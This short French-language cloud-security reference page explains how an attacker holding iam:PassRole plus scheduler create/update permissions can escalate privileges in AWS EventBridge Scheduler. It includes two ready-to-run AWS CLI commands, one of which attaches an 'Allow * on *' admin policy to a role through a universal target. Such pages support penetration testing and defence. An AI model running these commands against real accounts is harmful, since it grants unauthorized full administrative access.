AWS - EventBridge Scheduler Privesc

Reading time: 3 minutes

EventBridge Scheduler

Plus d'informations sur EventBridge Scheduler dans :

AWS - EventBridge Scheduler Enum

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Un attaquant disposant de ces permissions pourra create|update un scheduler et abuser des permissions du rôle du scheduler qui lui est attaché pour effectuer n'importe quelle action

Par exemple, il pourrait configurer la schedule pour invoquer une fonction Lambda qui est une action templatisée :

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

En plus des actions de service prédéfinies, vous pouvez utiliser universal targets dans EventBridge Scheduler pour invoquer un large éventail d'opérations API pour de nombreux services AWS. Les universal targets offrent la flexibilité d'invoquer quasiment n'importe quelle API. Un exemple consiste à utiliser universal targets pour ajouter "AdminAccessPolicy", en utilisant un rôle qui possède la stratégie "putRolePolicy" :

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

Références

• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html
• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html